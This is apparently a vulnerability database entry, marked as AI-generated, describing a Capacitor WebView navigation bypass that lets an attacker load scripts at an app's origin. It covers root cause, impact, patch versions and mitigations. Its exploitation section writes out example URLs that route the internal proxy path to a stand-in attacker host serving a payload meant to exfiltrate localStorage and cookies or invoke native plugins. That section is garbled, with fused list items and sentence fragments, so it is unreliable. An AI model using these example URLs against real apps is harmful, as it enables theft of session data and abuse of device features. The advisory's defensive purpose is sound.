
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-103922 is a WebView navigation bypass vulnerability in Ionic's Capacitor cross-platform native runtime affecting both Android and iOS. The flaw allows an attacker to navigate a WebView frame to the internal HTTP proxy path (/_capacitor_http_interceptor_), causing the native layer to fetch an attacker-controlled URL and return its response as a document at the application's own origin. Affected versions span from 6.0.0 through multiple 8.x releases across @capacitor/android, @capacitor/ios, com.capacitorjs:core, and github.com/ionic-team/capacitor-swift-pm. The vulnerability was published on October 1, 2026, with patches released on October 5, 2026. It carries a CVSS v3.1 base score of 9.3 (Critical) (GitHub Advisory).
The root cause is an incomplete navigation guard (CWE-346: Origin Validation Error) that validates only the host and scheme of a target URL but not its path, combined with a confused deputy issue (CWE-441) where the native HTTP proxy acts as an unintended intermediary. Because the internal proxy path (/_capacitor_http_interceptor_) shares the application's host and scheme (https://localhost on Android, capacitor://localhost on iOS), the navigation guard treats it as a legitimate in-app navigation. When a frame navigates to this path with an attacker-supplied u= query parameter, the native layer fetches the attacker-specified URL and returns the response body to the WebView at the app's own origin. Scripts in that response then execute with full same-origin trust, gaining access to localStorage, cookies, and all registered Capacitor plugin capabilities. Critically, the proxy handler was served regardless of whether the CapacitorHttp plugin was enabled, meaning applications that never opted into CapacitorHttp were equally vulnerable (GitHub Advisory, Patch Commit).
Successful exploitation allows an unauthenticated remote attacker to execute arbitrary scripts at the application's origin with full same-origin trust, resulting in high confidentiality and integrity impact (CVSS availability impact: None). An attacker can exfiltrate localStorage contents, session cookies, and any data accessible to the application's origin, and can invoke any native device capability exposed through registered Capacitor plugins (e.g., camera, file system, contacts, push notifications). The attack surface includes any Capacitor application that renders user-controlled or unsanitized links — such as chat messages, comments, or rich-text content — on both Android and iOS platforms (GitHub Advisory).
Exploitation requires user interaction: a victim must activate (click) a malicious link within the application's WebView, making it a social engineering-dependent attack. No confirmed working exploit code exists; a GitHub repository (techupdate24/capacitor-flaw-cve-2026-103922) was flagged as a fake claim containing only a README and banner image with no actual exploit code (Feedly). There is no evidence of in-the-wild exploitation, no threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.213%, reflecting low near-term exploitation probability (GitHub Advisory).
u parameter, e.g., https://localhost/_capacitor_http_interceptor_?u=https://attacker.com/payload.html (Android) or capacitor://localhost/_capacitor_http_interceptor_?u=https://attacker.com/payload.html (iOS).https://attacker.com/payload.html) containing scripts designed to exfiltrate localStorage, cookies, or invoke Capacitor plugin APIs.localStorage, cookies, and registered Capacitor plugin capabilities, enabling data exfiltration or native API abuse (GitHub Advisory).Handling CapacitorHttp request entries for URLs not matching the application's own assets or expected API endpoints; WebView navigation events targeting paths starting with /_capacitor_http_interceptor_.localStorage or cookie store.Upgrade Capacitor to one of the patched versions corresponding to your major release branch: 6.2.2, 7.6.9, 8.3.5, 8.4.3, or 8.5.1. After upgrading, rebuild and redistribute the application. If an immediate upgrade is not possible, note that disabling CapacitorHttp is not a sufficient workaround on affected versions, as the proxy path is served regardless of that setting. As a temporary mitigation, implement a custom plugin override: on Android, override shouldOverrideLoad(Uri url) and return true when url.getPath() starts with /_capacitor_http_interceptor_; on iOS, implement shouldOverrideLoad(_:) and return true for the same path. Additionally, sanitize all user-controlled link targets before rendering them in the WebView to reduce the attack surface (GitHub Advisory, Patch Commit).
The vulnerability received notable coverage from security news outlets including CyberSecurityNews, GBHackers, SecurityOnline, and Cryptika, with headlines emphasizing that malicious links could hijack app data and native features (CyberSecurityNews, GBHackers). The Hacker News weekly recap also referenced the vulnerability. Social media discussion appeared on Mastodon and Bluesky, with the infosec community noting the broad impact given Capacitor's widespread use in cross-platform mobile development. The vulnerability was credited to researcher andredestro in the official GitHub advisory (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."